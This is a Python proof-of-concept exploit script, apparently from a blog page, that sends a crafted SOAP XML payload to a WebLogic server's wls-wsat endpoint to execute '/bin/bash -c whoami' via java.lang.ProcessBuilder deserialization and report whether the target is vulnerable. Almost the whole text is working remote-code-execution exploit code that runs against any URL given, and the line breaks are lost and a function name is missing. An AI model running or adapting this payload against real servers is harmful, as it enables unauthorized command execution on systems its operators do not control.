1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67
|
import requests import re from sys import argv
heads = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Content-Type': 'text/xml;charset=UTF-8' }
def (url): if not url.startswith("http"): url = "http://" + url if "/" in url: url += '/wls-wsat/CoordinatorPortType' post_str = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>whoami</string> </void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> '''
try: response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads) response = response.text response = re.search(r"<faultstring>.*</faultstring>", response).group(0) except Exception, e: response = ""
if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response: result = "test ok" return result else: result = "No Vulnerability" return result
if __name__ == '__main__': if len(argv) == 1: print "python weblogic_poc.py url:port" exit(0) else: url = argv[1] result = poc(url=url) print result
|
近期评论